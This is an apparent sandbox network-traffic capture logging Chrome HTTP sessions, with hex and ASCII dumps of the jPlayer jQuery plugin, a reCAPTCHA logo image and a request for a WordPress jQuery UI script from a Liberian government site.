                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "cd61-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 52577
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC7823INData Raw: 2f 2a 0a 20 2a 20 6a 50 6c 61 79 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 70 6c 61 79 65 72 2e 6f 72 67 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 2d 20 32 30 31 33 20 48 61 70 70 79 77 6f 72 6d 20 4c 74 64 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 20 2a 0a 20 2a 20 41 75 74 68 6f 72 3a 20 4d 61 72 6b 20 4a 20 50 61 6e 61 67 68 69 73 74 6f 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 32 2e 35 2e 30 0a 20 2a 20 44 61 74 65 3a
                                                                                                                        Data Ascii: /* * jPlayer Plugin for jQuery JavaScript Library * http://www.jplayer.org * * Copyright (c) 2009 - 2013 Happyworm Ltd * Licensed under the MIT license. * http://opensource.org/licenses/MIT * * Author: Mark J Panaghiston * Version: 2.5.0 * Date:
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 6c 53 63 72 65 65 6e 29 7d 7d 2c 6d 75 74 65 64 3a 7b 6b 65 79 3a 38 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 5f 6d 75 74 65 64 28 21 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 64 29 7d 7d 2c 76 6f 6c 75 6d 65 55 70 3a 7b 6b 65 79 3a 33 38 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 76 6f 6c 75 6d 65 28 61 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 2b 0a 30 2e 31 29 7d 7d 2c 76 6f 6c 75 6d 65 44 6f 77 6e 3a 7b 6b 65 79 3a 34 30 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 76 6f 6c 75 6d 65 28 61 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 2d 30 2e 31 29 7d 7d 7d 2c 76 65 72 74 69 63 61 6c 56 6f 6c 75 6d 65 3a 21 31 2c 76 65 72 74 69 63 61 6c 50 6c 61 79 62 61 63 6b 52 61 74 65 3a 21 31 2c 67 6c 6f 62 61 6c 56 6f 6c 75 6d
                                                                                                                        Data Ascii: lScreen)}},muted:{key:8,fn:function(a){a._muted(!a.options.muted)}},volumeUp:{key:38,fn:function(a){a.volume(a.options.volume+0.1)}},volumeDown:{key:40,fn:function(a){a.volume(a.options.volume-0.1)}}},verticalVolume:!1,verticalPlaybackRate:!1,globalVolum
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 64 5b 65 5d 29 29 7d 65 6c 73 65 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 72 61 6d 22 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 63 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 62 29 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 62 6a 65 63 74 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 74 68 69 73 2e 69 6e 74 65 72 6e 61 6c 2e 66 6c 61 73 68 2e 69 64 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e
                                                                                                                        Data Ascii: ocument.createElement(d[e]))}else e=function(a,c,b){var d=document.createElement("param");d.setAttribute("name",c);d.setAttribute("value",b);a.appendChild(d)},c=document.createElement("object"),c.setAttribute("id",this.internal.flash.id),c.setAttribute("n
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 61 79 65 72 2e 65 76 65 6e 74 2e 72 65 70 65 61 74 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 61 29 3b 65 6c 73 65 20 69 66 28 74 68 69 73 2e 66 6c 61 73 68 2e 67 61 74 65 29 7b 69 66 28 74 68 69 73 2e 73 74 61 74 75 73 2e 73 72 63 53 65 74 29 7b 76 61 72 20 64 3d 74 68 69 73 2e 73 74 61 74 75 73 2e 63 75 72 72 65 6e 74 54 69 6d 65 2c 65 3d 74 68 69 73 2e 73 74 61 74 75 73 2e 70 61 75 73 65 64 3b 74 68 69 73 2e 73 65 74 4d 65 64 69 61 28 74 68 69 73 2e 73 74 61 74 75 73 2e 6d 65 64 69 61 29 3b 74 68 69 73 2e 76 6f 6c 75 6d 65 57 6f 72 6b 65 72 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 29 3b 30 3c 64 26 26 28 65 3f 74 68 69 73 2e 70 61 75 73 65 28 64 29 3a 74 68 69 73 2e 70 6c 61 79 28 64 29 29 7d 74 68 69 73 2e 5f 74 72 69 67 67 65
                                                                                                                        Data Ascii: ayer.event.repeat),this._trigger(a);else if(this.flash.gate){if(this.status.srcSet){var d=this.status.currentTime,e=this.status.paused;this.setMedia(this.status.media);this.volumeWorker(this.options.volume);0<d&&(e?this.pause(d):this.play(d))}this._trigge
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 69 73 2e 66 6c 61 73 68 2e 75 73 65 64 26 26 74 68 69 73 2e 5f 66 6c 61 73 68 5f 76 6f 6c 75 6d 65 28 61 29 3b 74 68 69 73 2e 68 74 6d 6c 2e 76 69 64 65 6f 2e 67 61 74 65 7c 7c 74 68 69 73 2e 68 74 6d 6c 2e 61 75 64 69 6f 2e 67 61 74 65 7c 7c 0a 28 74 68 69 73 2e 5f 75 70 64 61 74 65 56 6f 6c 75 6d 65 28 61 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 62 2e 6a 50 6c 61 79 65 72 2e 65 76 65 6e 74 2e 76 6f 6c 75 6d 65 63 68 61 6e 67 65 29 29 7d 2c 76 6f 6c 75 6d 65 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 68 69 73 2e 63 73 73 2e 6a 71 2e 76 6f 6c 75 6d 65 42 61 72 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 63 3d 62 28 61 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 64 3d 63 2e 6f 66 66 73 65 74 28 29 2c 65 3d 61 2e 70 61 67 65 58 2d 64
                                                                                                                        Data Ascii: is.flash.used&&this._flash_volume(a);this.html.video.gate||this.html.audio.gate||(this._updateVolume(a),this._trigger(b.jPlayer.event.volumechange))},volumeBar:function(a){if(this.css.jq.volumeBar.length){var c=b(a.currentTarget),d=c.offset(),e=a.pageX-d
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 77 69 64 74 68 2c 74 68 69 73 2e 73 74 61 74 75 73 2e 68 65 69 67 68 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 68 65 69 67 68 74 2c 74 68 69 73 2e 73 74 61 74 75 73 2e 63 73 73 43 6c 61 73 73 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 63 73 73 43 6c 61 73 73 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 77 69 64 74 68 3a 74 68 69 73 2e 73 74 61 74 75 73 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 68 69 73 2e 73 74 61 74 75 73 2e 68 65 69 67 68 74 7d 29 7d 2c 5f 61 64 64 55 69 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 61 6e 63 65 73 74 6f 72 4a 71 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 61 6e 63 65 73 74 6f 72 4a 71 2e 61 64 64
                                                                                                                        Data Ascii: =this.options.size.width,this.status.height=this.options.size.height,this.status.cssClass=this.options.size.cssClass);this.element.css({width:this.status.width,height:this.status.height})},_addUiClass:function(){this.ancestorJq.length&&this.ancestorJq.add
                                                                                                                        2025-01-10 13:54:49 UTC4754INData Raw: 6d 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 74 68 69 73 2e 5f 67 65 74 4d 6f 76 69 65 28 29 2e 66 6c 5f 6d 75 74 65 28 61 29 7d 63 61 74 63 68 28 62 29 7b 74 68 69 73 2e 5f 66 6c 61 73 68 45 72 72 6f 72 28 62 29 7d 7d 2c 5f 67 65 74 4d 6f 76 69 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 5b 74 68 69 73 2e 69 6e 74 65 72 6e 61 6c 2e 66 6c 61 73 68 2e 69 64 5d 7d 2c 0a 5f 67 65 74 46 6c 61 73 68 50 6c 75 67 69 6e 56 65 72 73 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 30 2c 62 3b 69 66 28 77 69 6e 64 6f 77 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 29 74 72 79 7b 69 66 28 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53
                                                                                                                        Data Ascii: mute:function(a){try{this._getMovie().fl_mute(a)}catch(b){this._flashError(b)}},_getMovie:function(){return document[this.internal.flash.id]},_getFlashPluginVersion:function(){var a=0,b;if(window.ActiveXObject)try{if(b=new ActiveXObject("ShockwaveFlash.S


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        46192.168.2.749837142.250.185.1644432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC467OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                        Host: www.google.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:49 UTC775INHTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                        Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                        Content-Length: 18160
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: sffe
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Expires: Fri, 10 Jan 2025 14:44:48 GMT
                                                                                                                        Cache-Control: public, max-age=3000
                                                                                                                        Age: 1
                                                                                                                        Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                        Content-Type: image/png
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close
                                                                                                                        2025-01-10 13:54:49 UTC615INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                        Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e 82 64 02
                                                                                                                        Data Ascii: UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4d
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa cb 2c af
                                                                                                                        Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/,
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25 c5 0a 16
                                                                                                                        Data Ascii: QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d 42 07 83
                                                                                                                        Data Ascii: ^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]B
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c 98 62 c1
                                                                                                                        Data Ascii: `FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\Lb
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e 01 13 b1
                                                                                                                        Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83 29 20 18
                                                                                                                        Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y)
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25 6d 89 05
                                                                                                                        Data Ascii: kYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%m
                                                                                                                        2025-01-10 13:54:49 UTC1390INData Raw: 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba 4d 8e 61
                                                                                                                        Data Ascii: 4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!draMa


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        47192.168.2.74983569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC438OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 27 Sep 2024 11:06:30 GMT
                                                                                                                        ETag: "53d8-62317d8e02038"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 21464
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
